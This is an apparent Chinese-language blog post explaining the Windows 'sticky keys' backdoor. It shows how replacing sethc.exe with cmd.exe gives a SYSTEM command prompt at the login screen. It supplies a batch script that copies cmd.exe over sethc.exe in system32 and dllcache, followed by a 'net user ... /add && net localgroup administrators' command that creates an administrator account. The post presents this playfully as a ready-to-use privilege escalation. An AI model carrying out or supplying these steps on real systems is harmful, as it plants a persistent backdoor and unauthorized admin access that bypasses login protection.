首先,要說的是不論幹什麼,強調的是原理 所以在這裏把後門的原理講清楚
首先,我們要說的是shift這個鍵連續按5下它會自動彈出個對話框.這個是windows裏面自帶的功能鍵
連續按5下後操作系統會自動找到c:\windows\system32\ 下面一個叫sethc.exe 的程序, 然後會彈出如下對話框
[attachment=9]
在進程裏面我們可以看到這個程序被系統運行了 不過是以我們自己的用戶運權限行的
[attachment=8]
但是當我們未登陸系統(停留在登陸界面)的時候 系統還不知道我們將以哪個用戶登陸,所以在這個時候連續按5次shift後門的話系統將會以system用戶(具有管理員級別的權限)來運行sethc.exe這個程序 那麼試想一下如果我們把cmd.exe這個程序更名稱sethc.exe並且把原來的sethc.exe替換掉的話 那麼在登陸界面的時候我們連續按下5吃shift鍵系統以system權限就會運行我們的CMD.exe 那麼我們的cmd.exe就具有了管理員權限了 如此一來 我們只要利用CMD加一個管理員用戶就可以登陸進去了 嘿嘿~~是不是很過癮呢~~
具體操作如下
寫一個批處理程序來實現吧
新建一個記事本 然後輸入以下內容,並保存爲.bat後綴的文件
echo 提權開始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提權結束......
雙擊下這個BAT文件然後註銷到登陸界面按5次shift 會彈出個cmd命令行
在裏面輸入如下內容
net user 你要添加的用戶名 密碼 /add && net localgroup administrators 你要添加的用戶名 /add
然後以你添加的用戶和密碼登陸就可以了 這個時候你的帳戶就是管理員權限了 嘿嘿~~~
PS:這招我好久沒用了 如果不行的話就自己手動去c:\windows\system32\下找CMD.exe改名成setch.exe把
c:\windows\system32\dllcache\ 和c:\windows\system32\ 下的sethc.exe給替換了就可以了
shift後門提權
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
Linux基本操作命令
wbzjacky
2019-02-24 13:12:38
真實的模擬***綜合實驗
wbzjacky
2019-02-24 13:12:37
三層交換機的HSRP、vlan、端口聚合
wbzjacky
2019-02-24 13:12:37
HSRP和二層交換機的端口聚合、vlan
wbzjacky
2019-02-24 13:12:37
如果同事暗中傷害你,應該怎麼辦?
這個饅頭有餡
2019-02-24 13:59:08
職場中,抱怨越多的員工,越被領導瞧不起!
這個饅頭有餡
2019-02-24 13:59:08
老程序員被裁,應屆生卻能月薪 1.3 萬?這你能忍?
前端高達
2019-02-24 13:48:04
遇到到處蹭吃卻從不請客吃飯的主怎麼辦?
樑軍年
2019-02-24 13:26:35
高標準機房綜合配線安裝
wbzjacky
2019-02-24 13:12:38
IPsec ***實驗
wbzjacky
2019-02-24 13:12:37
CISCO路由AAA的Easy ***
wbzjacky
2019-02-24 13:12:37
CISCO訪問控制列表 企業網絡管理的必殺技
wbzjacky
2019-02-24 13:12:37